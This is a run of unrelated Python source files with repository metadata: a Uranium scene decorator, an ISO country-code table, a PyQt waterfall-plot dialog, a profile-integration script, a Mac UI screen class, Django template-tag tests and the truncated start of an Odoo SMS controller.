from UM.Scene.SceneNodeDecorator import SceneNodeDecorator from UM.Scene.Selection import Selection from typing import TYPE_CHECKING, Optional if TYPE_CHECKING: from UM.Scene.SceneNode import SceneNode class GroupDecorator(SceneNodeDecorator): def __init__(self, remove_when_empty: bool = True) -> None: super().__init__() # Used to keep track of previous parent when an empty group removes itself from the scene. # We keep this option so that it's possible to undo it. self._old_parent = None # type: Optional[SceneNode] self._remove_when_empty = remove_when_empty def setNode(self, node: "SceneNode") -> None: super().setNode(node) if self._node is not None: self._node.childrenChanged.connect(self._onChildrenChanged) def isGroup(self) -> bool: return True def getOldParent(self) -> Optional["SceneNode"]: return self._old_parent def _onChildrenChanged(self, node: "SceneNode") -> None: if self._node is None: return if not self._remove_when_empty: return if not self._node.hasChildren(): # A group that no longer has children may remove itself from the scene self._old_parent = self._node.getParent() self._node.setParent(None) Selection.remove(self._node) else: # A group that has removed itself from the scene because it had no children may add itself back to the scene # when a child is added to it. if not self._node.getParent() and self._old_parent: self._node.setParent(self._old_parent) self._old_parent = None def __deepcopy__(self, memo): return GroupDecorator()
2f9bce858147dcf1996bd5661690506c4d32d259
d7fe33ef0959cf8d319db5e8c9d08b22ac100f50
/04_tavli/main/iso.py
0702a8fc0b4e479c0242e8db766984c6c5095ffb
[ "MIT" ]
permissive
georstef/GoogleAppEngine
79aaa3a969457ea318c4d5e50258d7b424dff7cc
008845ec768926513b1e5219267ea12e184cf3be
refs/heads/master
2020-04-20T21:34:29.654551
2014-08-03T11:07:04
2014-08-03T11:07:04
null
0
0
null
null
null
null
UTF-8
Python
false
false
6,179
py
# coding: utf-8 ISO_3166 = { 'AF': 'Afghanistan', 'AX': 'Åland Islands', 'AL': 'Albania', 'DZ': 'Algeria', 'AS': 'American Samoa', 'AD': 'Andorra', 'AO': 'Angola', 'AI': 'Anguilla', 'AQ': 'Antarctica', 'AG': 'Antigua and Barbuda', 'AR': 'Argentina', 'AM': 'Armenia', 'AW': 'Aruba', 'AU': 'Australia', 'AT': 'Austria', 'AZ': 'Azerbaijan', 'BS': 'Bahamas', 'BH': 'Bahrain', 'BD': 'Bangladesh', 'BB': 'Barbados', 'BY': 'Belarus', 'BE': 'Belgium', 'BZ': 'Belize', 'BJ': 'Benin', 'BM': 'Bermuda', 'BT': 'Bhutan', 'BO': 'Bolivia', 'BQ': 'Bonaire', 'BA': 'Bosnia and Herzegovina', 'BW': 'Botswana', 'BV': 'Bouvet Island', 'BR': 'Brazil', 'IO': 'British Indian Ocean Territory', 'BN': 'Brunei Darussalam', 'BG': 'Bulgaria', 'BF': 'Burkina Faso', 'BI': 'Burundi', 'KH': 'Cambodia', 'CM': 'Cameroon', 'CA': 'Canada', 'CV': 'Cape Verde', 'KY': 'Cayman Islands', 'CF': 'Central African Republic', 'TD': 'Chad', 'CL': 'Chile', 'CN': 'China', 'CX': 'Christmas Island', 'CC': 'Cocos (Keeling) Islands', 'CO': 'Colombia', 'KM': 'Comoros', 'CG': 'Congo', 'CD': 'Congo, the Democratic Republic of the', 'CK': 'Cook Islands', 'CR': 'Costa Rica', 'CI': "Côte d'Ivoire", 'HR': 'Croatia', 'CU': 'Cuba', 'CW': 'Curaçao', 'CY': 'Cyprus', 'CZ': 'Czech Republic', 'DK': 'Denmark', 'DJ': 'Djibouti', 'DM': 'Dominica', 'DO': 'Dominican Republic', 'EC': 'Ecuador', 'EG': 'Egypt', 'SV': 'El Salvador', 'GQ': 'Equatorial Guinea', 'ER': 'Eritrea', 'EE': 'Estonia', 'ET': 'Ethiopia', 'FK': 'Falkland Islands (Malvinas)', 'FO': 'Faroe Islands', 'FJ': 'Fiji', 'FI': 'Finland', 'FR': 'France', 'GF': 'French Guiana', 'PF': 'French Polynesia', 'TF': 'French Southern Territories', 'GA': 'Gabon', 'GM': 'Gambia', 'GE': 'Georgia', 'DE': 'Germany', 'GH': 'Ghana', 'GI': 'Gibraltar', 'GR': 'Greece', 'GL': 'Greenland', 'GD': 'Grenada', 'GP': 'Guadeloupe', 'GU': 'Guam', 'GT': 'Guatemala', 'GG': 'Guernsey', 'GN': 'Guinea', 'GW': 'Guinea-Bissau', 'GY': 'Guyana', 'HT': 'Haiti', 'HM': 'Heard Island and McDonald Islands', 'VA': 'Holy See (Vatican City State)', 'HN': 'Honduras', 'HK': 'Hong Kong', 'HU': 'Hungary', 'IS': 'Iceland', 'IN': 'India', 'ID': 'Indonesia', 'IR': 'Iran', 'IQ': 'Iraq', 'IE': 'Ireland', 'IM': 'Isle of Man', 'IL': 'Israel', 'IT': 'Italy', 'JM': 'Jamaica', 'JP': 'Japan', 'JE': 'Jersey', 'JO': 'Jordan', 'KZ': 'Kazakhstan', 'KE': 'Kenya', 'KI': 'Kiribati', 'KP': 'North Korea', 'KR': 'South Korea', 'KW': 'Kuwait', 'KG': 'Kyrgyzstan', 'LA': "Lao People's Democratic Republic", 'LV': 'Latvia', 'LB': 'Lebanon', 'LS': 'Lesotho', 'LR': 'Liberia', 'LY': 'Libya', 'LI': 'Liechtenstein', 'LT': 'Lithuania', 'LU': 'Luxembourg', 'MO': 'Macao', 'MK': 'Macedonia, the former Yugoslav Republic of', 'MG': 'Madagascar', 'MW': 'Malawi', 'MY': 'Malaysia', 'MV': 'Maldives', 'ML': 'Mali', 'MT': 'Malta', 'MH': 'Marshall Islands', 'MQ': 'Martinique', 'MR': 'Mauritania', 'MU': 'Mauritius', 'YT': 'Mayotte', 'MX': 'Mexico', 'FM': 'Micronesia, Federated States of', 'MD': 'Moldova', 'MC': 'Monaco', 'MN': 'Mongolia', 'ME': 'Montenegro', 'MS': 'Montserrat', 'MA': 'Morocco', 'MZ': 'Mozambique', 'MM': 'Myanmar', 'NA': 'Namibia', 'NR': 'Nauru', 'NP': 'Nepal', 'NL': 'Netherlands', 'NC': 'New Caledonia', 'NZ': 'New Zealand', 'NI': 'Nicaragua', 'NE': 'Niger', 'NG': 'Nigeria', 'NU': 'Niue', 'NF': 'Norfolk Island', 'MP': 'Northern Mariana Islands', 'NO': 'Norway', 'OM': 'Oman', 'PK': 'Pakistan', 'PW': 'Palau', 'PS': 'Palestine, State of', 'PA': 'Panama', 'PG': 'Papua New Guinea', 'PY': 'Paraguay', 'PE': 'Peru', 'PH': 'Philippines', 'PN': 'Pitcairn', 'PL': 'Poland', 'PT': 'Portugal', 'PR': 'Puerto Rico', 'QA': 'Qatar', 'RE': 'Réunion', 'RO': 'Romania', 'RU': 'Russia', 'RW': 'Rwanda', 'BL': 'Saint Barthélemy', 'SH': 'Saint Helena, Ascension and Tristan da Cunha', 'KN': 'Saint Kitts and Nevis', 'LC': 'Saint Lucia', 'MF': 'Saint Martin (French part)', 'PM': 'Saint Pierre and Miquelon', 'VC': 'Saint Vincent and the Grenadines', 'WS': 'Samoa', 'SM': 'San Marino', 'ST': 'Sao Tome and Principe', 'SA': 'Saudi Arabia', 'SN': 'Senegal', 'RS': 'Serbia', 'SC': 'Seychelles', 'SL': 'Sierra Leone', 'SG': 'Singapore', 'SX': 'Sint Maarten (Dutch part)', 'SK': 'Slovakia', 'SI': 'Slovenia', 'SB': 'Solomon Islands', 'SO': 'Somalia', 'ZA': 'South Africa', 'GS': 'South Georgia and the South Sandwich Islands', 'SS': 'South Sudan', 'ES': 'Spain', 'LK': 'Sri Lanka', 'SD': 'Sudan', 'SR': 'Suriname', 'SJ': 'Svalbard and Jan Mayen', 'SZ': 'Swaziland', 'SE': 'Sweden', 'CH': 'Switzerland', 'SY': 'Syrian Arab Republic', 'TW': 'Taiwan', 'TJ': 'Tajikistan', 'TZ': 'Tanzania, United Republic of', 'TH': 'Thailand', 'TL': 'Timor-Leste', 'TG': 'Togo', 'TK': 'Tokelau', 'TO': 'Tonga', 'TT': 'Trinidad and Tobago', 'TN': 'Tunisia', 'TR': 'Turkey', 'TM': 'Turkmenistan', 'TC': 'Turks and Caicos Islands', 'TV': 'Tuvalu', 'UG': 'Uganda', 'UA': 'Ukraine', 'AE': 'United Arab Emirates', 'GB': 'United Kingdom', 'US': 'United States', 'UM': 'United States Minor Outlying Islands', 'UY': 'Uruguay', 'UZ': 'Uzbekistan', 'VU': 'Vanuatu', 'VE': 'Venezuela', 'VN': 'Vietnam', 'VG': 'Virgin Islands, British', 'VI': 'Virgin Islands, U.S.', 'WF': 'Wallis and Futuna', 'EH': 'Western Sahara', 'YE': 'Yemen', 'ZM': 'Zambia', 'ZW': 'Zimbabwe', }
adaf1da2130a33488620aa75caf973fd545999c8
3365e4d4fc67bbefe4e8c755af289c535437c6f4
/.history/src/core/dialogs/waterfall_dialog_20170816111635.py
a04802520a5bea5ee054bf9af320a163c394bcc6
[]
no_license
kiranhegde/OncoPlotter
f3ab9cdf193e87c7be78b16501ad295ac8f7d2f1
b79ac6aa9c6c2ca8173bc8992ba3230aa3880636
refs/heads/master
2021-05-21T16:23:45.087035
2017-09-07T01:13:16
2017-09-07T01:13:16
null
0
0
null
null
null
null
UTF-8
Python
false
false
12,845
py
''' Refs: Embedding plot: https://sukhbinder.wordpress.com/2013/12/16/simple-pyqt-and-matplotlib-example-with-zoompan/ ''' from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar import matplotlib.pyplot as plt from PyQt5.QtWidgets import (QColorDialog, QHeaderView, QApplication, QDialog, QWidget, QPushButton, QVBoxLayout, QTreeWidget, QTreeWidgetItem, QComboBox) from PyQt5 import QtCore, QtGui import core.gui.waterfall as waterfall import numpy as np import shelve from pprint import pprint class CustomCombo(QComboBox): def __init__(self,parent,bar_keys_colors,response_type): super(QComboBox,self).__init__(parent) #keys is a dictionary: {'key description':color,...} self.dict_of_keys = bar_keys_colors self.response_type = response_type self.populate() def populate(self): '''Override method to add items to list''' for key in list(self.dict_of_keys.keys()): self.pixmap = QtGui.QPixmap(20,20) self.pixmap.fill(QtGui.QColor(self.dict_of_keys[key])) self.color_icon = QtGui.QIcon(self.pixmap) self.addItem(self.color_icon,key) self.setCurrentIndex(self.findText(self.response_type,flags=QtCore.Qt.MatchContains)) #default to the patient cancer type class Waterfall(QWidget, waterfall.Ui_Waterfall): plot_settings_signal = QtCore.pyqtSignal(list) #send list of plotting params updated_rectangles_signal = QtCore.pyqtSignal(list) #send list of updated artists for redrawing def __init__(self, parent): super(Waterfall,self).__init__(parent) self.setupUi(self) self.get_settings() self.send_settings() #Button functions self.btn_apply_general_settings.clicked.connect(self.send_settings) self.btn_apply_keys_and_colors_settings.clicked.connect(self.send_settings) self.patient_tree = self.create_patient_tree() self.data_viewer_container.addWidget(self.patient_tree) self.btn_color_test.clicked.connect(self.get_color) def get_color(self): self.color = QColorDialog.getColor() #returns a color object print(color) def get_settings(self): try: with shelve.open('WaterfallSettings') as shelfFile: self.keys_and_colors = shelfFile['keys_and_colors'] shelfFile.close() except: #set and use default settings self.keys_and_colors = { 'CR':'#03945D', 'PR':'#B1EE97', 'PD':'#FF6F69', 'SD':'#707070'} with shelve.open('WaterfallSettings') as shelfFile: shelfFile['keys_and_colors'] = self.keys_and_colors shelfFile.close() def on_waterfall_data_signal(self,signal): self.waterfall_data = signal['waterfall_data'] #pandas dataframe def on_generated_rectangles_signal(self,signal): self.rectangles_received = signal[0] self.add_items() #display in table def send_settings(self): ''' Emit both general plot settings, and color labeling settings. These are the settings to be used when the plot is created. ''' self.general_settings = [ self.plot_title.text(), self.x_label.text(), self.y_label.text(), [self.twenty_percent_line.isChecked(), self.thirty_percent_line.isChecked(), self.zero_percent_line.isChecked()], [self.display_responses_as_text.isChecked(), self.display_responses_as_color.isChecked(), self.display_no_responses.isChecked()], self.include_table.isChecked() ] self.plot_settings_signal.emit(self.general_settings) def create_patient_tree(self): ''' Create QTreeWidget populated with a patient's data for the DataEntry dialog. Assumes that self.temp_patient is the patient of interest and that the variable belongs to the dialog. ''' self.tree = QTreeWidget() self.root = self.tree.invisibleRootItem() self.headers = [ 'Patient #', 'Best response %', 'Response', 'Cancer', 'Color key', ] self.headers_item = QTreeWidgetItem(self.headers) self.tree.setColumnCount(len(self.headers)) self.tree.setHeaderItem(self.headers_item) self.root.setExpanded(True) self.tree.header().setSectionResizeMode(QHeaderView.ResizeToContents) self.tree.header().setStretchLastSection(False) return self.tree def add_items(self): ''' Populate viewing tree ''' self.tree.clear() #clear prior to entering items, prevent aggregation i=0 for rect in self.rectangles_received: #populate editable tree with rect data self.rect_item = QTreeWidgetItem(self.root) self.rect_params = [ self.waterfall_data['Patient number'][i], rect.get_height(), self.waterfall_data['Overall response'][i], self.waterfall_data['Cancer'][i] ] for col in range(0,4): self.rect_item.setText(col,str(self.rect_params[col])) self.rect_item.setTextAlignment(col,4) self.tree.setItemWidget(self.rect_item, 4, CustomCombo(self,self.keys_and_colors,self.waterfall_data['Overall response'][i])) self.rect_item.setFlags(self.rect_item.flags() | QtCore.Qt.ItemIsEditable) i+=1 def on_updated_tree_item(self): #update the rectangle which was edited pass class WaterfallPlotter(QWidget): generated_rectangles_signal = QtCore.pyqtSignal(list) #send list of rects for data display in tree def __init__(self,parent): super(WaterfallPlotter,self).__init__(parent) self.get_settings() self.settings_update = False self.figure = plt.figure() self.canvas = FigureCanvas(self.figure) self.toolbar = NavigationToolbar(self.canvas,self) self.btn_plot = QPushButton('Default Plot') self.btn_plot.clicked.connect(self.default_plot) self.layout = QVBoxLayout() self.layout.addWidget(self.toolbar) self.layout.addWidget(self.canvas) self.layout.addWidget(self.btn_plot) self.setLayout(self.layout) def on_waterfall_data_signal(self,signal): self.waterfall_data = signal['waterfall_data'] #pandas dataframe self.btn_plot.setEnabled(True) self.btn_apply_general_settings.setEnabled(True) def get_settings(self): try: with shelve.open('WaterfallSettings') as shelfFile: self.keys_and_colors = shelfFile['keys_and_colors'] shelfFile.close() except: #set and use default settings self.keys_and_colors = { 'CR':'#03945D', 'PR':'#B1EE97', 'PD':'#FF6F69', 'SD':'#707070'} with shelve.open('WaterfallSettings') as shelfFile: shelfFile['keys_and_colors'] = self.keys_and_colors shelfFile.close() def on_general_settings_signal(self,signal): self.gen_settings = signal self.settings_update = True try: hasattr(self,'ax') self.ax.set_title(self.gen_settings[0]) self.ax.set_xlabel(self.gen_settings[1]) self.ax.set_ylabel(self.gen_settings[2]) self.canvas.draw() except Exception as e: print(e) self.default_plot() def bar_colors(self,responses): return [self.keys_and_colors[x] for x in responses] def default_plot(self): ''' Plot waterfall data ''' self.figure.clear() self.rect_locations = np.arange(len(self.waterfall_data['Best response percent change'])) self.ax = self.figure.add_subplot(111) if self.settings_update == False: self.ax.axhline(y=20, linestyle='--', c='k', alpha=0.5, lw=2.0, label='twenty_percent') self.ax.axhline(y=-30, linestyle='--', c='k', alpha=0.5, lw=2.0, label='thirty_percent') self.ax.axhline(y=0, c='k', alpha=1, lw=2.0, label='zero_percent') self.ax.grid(color = 'k', axis = 'y', alpha=0.25) self.bar_colors = self.bar_colors(self.waterfall_data['Overall response']) self.rects = self.ax.bar(self.rect_locations, self.waterfall_data['Best response percent change'], color=self.bar_colors) else: #settings were updated, we received them and stored in variable self.gen_settings if self.gen_settings[3][0]: self.ax.axhline(y=20, linestyle='--', c='k', alpha=0.5, lw=2.0, label='twenty_percent') if self.gen_settings[3][1]: self.ax.axhline(y=-30, linestyle='--', c='k', alpha=0.5, lw=2.0, label='thirty_percent') if self.gen_settings[3][2]: self.ax.axhline(y=0, c='k', alpha=1, lw=2.0, label='zero_percent') if self.gen_settings[4][0]: #show responses as labels, default color bars self.rects = self.ax.bar(self.rect_locations, self.waterfall_data['Best response percent change']) self.auto_label_responses(self.ax, self.rects, self.waterfall_data) elif self.gen_settings[4][1]: self.bar_colors = self.bar_colors(self.waterfall_data['Overall response']) self.rects = self.ax.bar(self.rect_locations, self.waterfall_data['Best response percent change'], color=self.bar_colors) else: self.rects = self.ax.bar(self.rect_locations, self.waterfall_data['Best response percent change']) if self.gen_settings[5]: self.plot_table() self.ax.grid(color = 'k', axis = 'y', alpha=0.25) self.canvas.draw() self.ax.hold(False) #rewrite the plot when plot() called self.generated_rectangles_signal.emit([self.rects]) def plot_table(self): rows = ['%s' % x for x in self.waterfall_data.keys()] rows = rows[4:] #skip first three, they are the 4 standard headers, rest are table rows columns = self.waterfall_data['Patient number'] #patient numbers cell_text = [] for row in rows: cell_text_temp = [] for col in range(len(columns)): cell_text_temp.append(self.waterfall_data[row][col]) cell_text.append(cell_text_temp) the_table = plt.table(cellText=cell_text, rowLabels=rows, colLabels=columns, loc='bottom', cellLoc='center') plt.subplots_adjust(bottom=0.15,left=0.5) self.ax.set_xlim(-0.5,len(columns)-0.5) plt.tick_params( axis='x', # changes apply to the x-axis which='both', # both major and minor ticks are affected bottom='off', # ticks along the bottom edge are off top='off', # ticks along the top edge are off labelbottom='off' ) # labels along the bottom edge are off def update_plot(self): ''' TODO ''' pass def auto_label_responses(self, ax, rects, waterfall_data): '''Add labels above/below bars''' i = 0 for rect in rects: height = rect.get_height() if height >= 0: valign = 'bottom' else: valign = 'top' ax.text(rect.get_x() + rect.get_width()/2., height, '%s' % waterfall_data['Overall response'][i], ha='center', va=valign) i+=1
85566a279360d8fee75c2ed3b6a5c4fe6426afc1
30d360f965253167c99f9b4cd41001491aed08af
/PTFE_code/integrate_profile.py
4ba0587d6305af16574d6b5b2d36c2e9a6d5dba3
[]
no_license
petervanya/PhDcode
d2d9f7170f201d6175fec9c3d4094617a5427fb5
891e6812a2699025d26b901c95d0c46a706b0c96
refs/heads/master
2020-05-22T06:43:47.293134
2018-01-29T12:59:42
2018-01-29T12:59:42
64,495,043
1
0
null
null
null
null
UTF-8
Python
false
false
1,856
py
#!/usr/bin/env python """Usage: integrate_profile.py <profile> <d> [--L <L>] [AD HOC] Load 1d water profile and integrate volume of water in polymer and in electrodes. Arguments: <file> Water profile, columns [r, f] <d> Slab width in nm Options: --L <L> Box size in DPD units [default: 40] 09/11/16 """ import numpy as np from scipy.integrate import simps import sys from docopt import docopt rc = 8.14e-10 if __name__ == "__main__": args = docopt(__doc__) L = float(args["--L"]) d_nm = float(args["<d>"]) d = d_nm * 1e-9 / rc try: A = np.loadtxt(args["<profile>"]) except FileNotFoundError: sys.exit("No file found: %s." % args["<profile>"]) r, f = A[:, 0], A[:, 1] if d < 0.0 or d > L: sys.exit("Slab width larger than box size.") print("===== Integrating water profile =====") print("L: %.2f | slab width: %.2f (%.2f nm)" % (L, d, d_nm)) dr = r[1] - r[0] re1 = r[r < (L-d)/2] re2 = r[r > (L+d)/2] rm = r[(r >= (L-d)/2) & (r <= (L+d)/2)] fe1 = f[r < (L-d)/2] fe2 = f[r > (L+d)/2] fm = f[(r >= (L-d)/2) & (r <= (L+d)/2)] water_film = simps(fm, dx=dr) water_elec = simps(fe1, dx=dr) + simps(fe2, dx=dr) water_tot = simps(f, dx=dr) print("Total water: %.2f" % water_tot) print("Electrodes: %.2f | Film: %.2f | mat / el: %.2f" % \ (water_elec, water_film, water_film / water_elec)) R = water_film / (water_film + water_elec) print("Ratio of water in the film: %.2f" % R) # water_film = np.sum(fm) * dr # water_elec = (np.sum(fe1) + np.sum(fe2)) * dr # water_tot = np.sum(f) * dr # # print("Naive quadrature | Total water: %.2f" % water_tot) # print("Electrodes: %.2f | Matrix: %.2f | mat / el: %.2f" % \ # (water_elec, water_film, water_film / water_elec))
0bea389e510b7977e448170db9a97655fd4abd53
7b4e9342d42be2b55af5dc23a8abedd672d68e99
/MobileApps/libs/flows/mac/smart/screens/printersettings/printer_from_other_devices.py
96ab7c3b1a277a1e82cb0c00364ddd13f515ba52
[]
no_license
Amal548/QAMA
af5bb335c92a90b461f1ee9a3870435d83d46802
b5230c51d3bc7bb04b3448d1a1fe5a076d8898d5
refs/heads/master
2023-07-12T09:17:04.624677
2021-08-06T08:01:11
2021-08-06T08:01:11
389,595,655
0
0
null
null
null
null
UTF-8
Python
false
false
1,596
py
# encoding: utf-8 ''' Description: It defines the operations of element and verification methods on the printer from other devices screen. @author: Sophia @create_date: Sep 18, 2019 ''' import logging from MobileApps.libs.flows.mac.smart.screens.smart_screens import SmartScreens from MobileApps.libs.flows.mac.smart.screens.printersettings.printer_setting_scroll import PrinterSettingScroll class PrinterFromOtherDevices(PrinterSettingScroll, SmartScreens): folder_name = "printersettings" flow_name = "print_from_other_devices" def __init__(self, driver): ''' This is initial method for class. :parameter: :return: ''' super(PrinterFromOtherDevices, self).__init__(driver) # -------------------------------Operate Elements------------------------------ def wait_for_screen_load(self, timeout=30, raise_e=True): ''' This is a method to wait print from other devices screen load correctly :parameter: :return: ''' logging.debug("[PrinterFromOtherDevices]:[wait_for_screen_load]-Wait for screen loading... ") return self.driver.wait_for_object("send_link_btn", timeout=timeout, raise_e=raise_e) def click_send_link_btn(self): ''' This is a method to click send link button. :parameter: :return: ''' logging.debug("[PrinterFromOtherDevices]:[click_send_link_btn]-Click send link button... ") self.driver.click("send_link_btn") # -------------------------------Verification Methods--------------------------
965136bc0b42a3aabe975b1fa258634b2f69fa3e
395ebd49c4f3a083369406f1cdcb89cfb79fa57f
/tests/core/test_templatetags.py
76c80869a6d716dc37f8963d8da04fb543a6c65a
[ "MIT" ]
permissive
philgyford/django-spectator
dbf76d93d1ccce9225c4a907c368f6e2cc4462c1
2d89dcdb624b01452a5b6ca0ee092774fcc0aa52
refs/heads/main
2023-07-24T06:43:13.846287
2023-07-11T14:16:34
2023-07-11T14:16:34
83,340,861
45
9
MIT
2023-07-11T09:48:16
2017-02-27T18:04:48
Python
UTF-8
Python
false
false
9,851
py
from unittest.mock import Mock, patch from django.http import QueryDict from django.test import TestCase from spectator.core.apps import Apps from spectator.core.factories import IndividualCreatorFactory from spectator.core.templatetags.spectator_core import ( change_object_link_card, domain_urlize, get_enabled_apps, get_item, most_read_creators, most_read_creators_card, most_visited_venues, most_visited_venues_card, query_string, ) from spectator.events.factories import MiscEventFactory, VenueFactory from spectator.reading.factories import ( PublicationFactory, PublicationRoleFactory, ReadingFactory, ) from .. import make_date class GetEnabledAppsTestCase(TestCase): @patch.object(Apps, "all") def test_results(self, patched_all): # all() will return an app that is not installed: patched_all.return_value = ["events", "reading", "NOPE"] # So 'NOPE' shouldn't be returned here: enabled_apps = get_enabled_apps() self.assertEqual(2, len(enabled_apps)) self.assertEqual(enabled_apps[0], "events") self.assertEqual(enabled_apps[1], "reading") class GetItemTestCase(TestCase): def test_key(self): dict = {"a": 1} self.assertEqual(get_item(dict, "a"), 1) def test_key_none(self): dict = {"a": 1} self.assertIsNone(get_item(dict, "b")) class DomainUrlizeTestCase(TestCase): def test_domain_urlize(self): self.assertEqual( domain_urlize("http://www.example.org/foo/"), '<a href="http://www.example.org/foo/" rel="nofollow">example.org</a>', ) class ChangeObjectLinkCardTestCase(TestCase): def test_output_can_change(self): creator = IndividualCreatorFactory(pk=5) perms = ["spectator.can_edit_creator"] result = change_object_link_card(creator, perms) self.assertTrue(result["display_link"]) self.assertEqual( result["change_url"], "/admin/spectator_core/creator/5/change/" ) class QueryStringTestCase(TestCase): def test_adds_arg(self): "It adds your key/value to the existing GET string." context = {"request": Mock(GET=QueryDict("a=1"))} self.assertIn( query_string(context, "foo", "bar"), ["foo=bar&a=1", "a=1&foo=bar"] ) def test_replaces_arg(self): "It replaces an existing GET arg with what you supply." context = {"request": Mock(GET=QueryDict("a=1"))} self.assertEqual(query_string(context, "a", "bar"), "a=bar") def test_handles_missing_request(self): "If there's no request object, it doesn't complain." context = {} self.assertEqual(query_string(context, "foo", "bar"), "foo=bar") def test_urlencodes(self): "It URL-encodes the returned string." context = {"request": Mock(GET=QueryDict("a=1"))} self.assertIn( query_string(context, "foo", "bar&bar"), ["foo=bar%26bar&a=1", "a=1&foo=bar%26bar"], ) class MostReadCreatorsTestCase(TestCase): def test_returns_queryset(self): "It should return 10 items by default." d = make_date("2017-02-15") for i in range(11): c = IndividualCreatorFactory() pub = PublicationFactory() PublicationRoleFactory(publication=pub, creator=c, role_name="") ReadingFactory(publication=pub, start_date=d, end_date=d, is_finished=True) creators = most_read_creators() self.assertEqual(len(creators), 10) def test_num(self): "It should return `num` items." d = make_date("2017-02-15") for i in range(4): c = IndividualCreatorFactory() pub = PublicationFactory() PublicationRoleFactory(publication=pub, creator=c, role_name="") ReadingFactory(publication=pub, start_date=d, end_date=d, is_finished=True) creators = most_read_creators(num=3) self.assertEqual(len(creators), 3) def test_finished(self): "It should only return finished readings" d = make_date("2017-02-15") # A finished reading c1 = IndividualCreatorFactory() pub1 = PublicationFactory() PublicationRoleFactory(publication=pub1, creator=c1, role_name="") ReadingFactory(publication=pub1, start_date=d, end_date=d, is_finished=True) ReadingFactory(publication=pub1, start_date=d, end_date=d, is_finished=True) ReadingFactory(publication=pub1, start_date=d, end_date=d, is_finished=False) # An unfinished reading c2 = IndividualCreatorFactory() pub2 = PublicationFactory() PublicationRoleFactory(publication=pub2, creator=c2, role_name="") ReadingFactory(publication=pub2, start_date=d, end_date=d, is_finished=False) creators = most_read_creators() self.assertEqual(len(creators), 1) self.assertEqual(creators[0], c1) self.assertEqual(creators[0].num_readings, 2) class MostReadCreatorsCardTestCase(TestCase): def test_returns_correct_data(self): d = make_date("2017-02-15") for i in range(2, 13): c = IndividualCreatorFactory() pub = PublicationFactory() PublicationRoleFactory(publication=pub, creator=c, role_name="") # It'll cut off any with only 1 reading, so: ReadingFactory.create_batch( i, publication=pub, start_date=d, end_date=d, is_finished=True ) data = most_read_creators_card() self.assertIn("card_title", data) self.assertIn("score_attr", data) self.assertIn("object_list", data) self.assertEqual(data["card_title"], "Most read authors") self.assertEqual(data["score_attr"], "num_readings") self.assertEqual(len(data["object_list"]), 10) def test_num(self): "It should return `num` items." d = make_date("2017-02-15") for i in range(2, 6): c = IndividualCreatorFactory() pub = PublicationFactory() PublicationRoleFactory(publication=pub, creator=c, role_name="") # It'll cut off any with only 1 reading, so: ReadingFactory.create_batch( i, publication=pub, start_date=d, end_date=d, is_finished=True ) data = most_read_creators_card(num=3) self.assertIn("object_list", data) self.assertEqual(len(data["object_list"]), 3) def test_finished(self): "It should only return finished readings" d = make_date("2017-02-15") # A finished reading c1 = IndividualCreatorFactory() pub1 = PublicationFactory() PublicationRoleFactory(publication=pub1, creator=c1, role_name="") # It'll cut off any with only 1 reading, so: ReadingFactory.create_batch( 3, publication=pub1, start_date=d, end_date=d, is_finished=True ) # Another finished reading (so there's a chart) c2 = IndividualCreatorFactory() pub2 = PublicationFactory() PublicationRoleFactory(publication=pub2, creator=c2, role_name="") # It'll cut off any with only 1 reading, so: ReadingFactory.create_batch( 2, publication=pub2, start_date=d, end_date=d, is_finished=True ) # An unfinished reading for the same author - they should still be in the # chart though, because they have one finished reading. ReadingFactory(publication=pub2, start_date=d, end_date=d, is_finished=False) # An unfinished reading c3 = IndividualCreatorFactory() pub3 = PublicationFactory() PublicationRoleFactory(publication=pub3, creator=c3, role_name="") # It'll cut off any with only 1 reading, so: ReadingFactory.create_batch( 2, publication=pub3, start_date=d, end_date=d, is_finished=False ) data = most_read_creators_card() self.assertIn("object_list", data) self.assertEqual(len(data["object_list"]), 2) self.assertEqual(data["object_list"][0], c1) self.assertEqual(data["object_list"][0].num_readings, 3) self.assertEqual(data["object_list"][1], c2) self.assertEqual(data["object_list"][1].num_readings, 2) class MostVisitedVenuesTestCase(TestCase): def test_returns_queryset(self): "It should return 10 items by default." for i in range(11): MiscEventFactory(venue=VenueFactory()) venues = most_visited_venues() self.assertEqual(len(venues), 10) def test_num(self): "It should return `num` items." for i in range(4): MiscEventFactory(venue=VenueFactory()) venues = most_visited_venues(num=3) self.assertEqual(len(venues), 3) class MostVisitedVenuesCardTestCase(TestCase): def test_returns_correct_data(self): for i in range(2, 13): # It'll cut off any with only 1 reading, so: MiscEventFactory.create_batch(i, venue=VenueFactory()) data = most_visited_venues_card() self.assertIn("card_title", data) self.assertIn("score_attr", data) self.assertIn("object_list", data) self.assertEqual(data["card_title"], "Most visited venues") self.assertEqual(data["score_attr"], "num_visits") self.assertEqual(len(data["object_list"]), 10) def test_num(self): "It should return `num` items." for i in range(2, 6): # It'll cut off any with only 1 reading, so: MiscEventFactory.create_batch(i, venue=VenueFactory()) data = most_visited_venues_card(num=3) self.assertIn("object_list", data) self.assertEqual(len(data["object_list"]), 3)
89dece8d86d548eb18d50cf9020cc5d85d9c4d93
4b4d21f6a2aaf8cb0ece595e4aaf9cb705ffdd49
/marketing_message/controllers/controllers.py
c83db22f29b37ed9ac02bcf44de219ae2e23a33a
[]
no_license
sc4you/odoo-project-10.0
e8c82b4cd42c0672e996561e75e0f9d0717821fa
bca7e400b6316bcbcefe6f0d088cb97a28f644bb
refs/heads/master
2020-03-21T13:41:08.042847
2018-05-15T07:41:58
2018-05-15T07:41:58
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,270
py
# -*- coding: utf-8 -*- import babel.dates import time, json from datetime import datetime, timedelta from dateutil.relativedelta import relativedelta import werkzeug.urls from werkzeug.exceptions import NotFound import random from odoo import http from odoo import tools from odoo.http import request from odoo.tools.translate import _ from odoo.exceptions import UserError, ValidationError import httplib import urllib import json # 服务条款 class SmsEvent(http.Controller): def __init__(self): param = request.env()['ir.config_parameter'] self.account = param.get_param('account') or '' self.password = param.get_param('password') or '' self.host_sign = param.get_param('host_sign') or '' self.host_marketing = param.get_param('host_marketing') or '' self.sms_heard = param.get_param('sms_heard') or '' # 发送请求 def send_post(self, datas, host, sms_send_uri): try: datas = json.dumps(datas) """发送post请求""" headers = {"Content-type": "application/json"} conn = httplib.HTTPConnection(host, port=80, timeout=30) conn.request("POST", sms_send_uri, datas, headers) response = conn.getresponse() response_str = response.read() conn.close() return response_str except Exception: return False # 发送短信验证码 def commit_send_message(self, tel, code): sms_send_uri = "/msg/variable/json" phone = tel code = 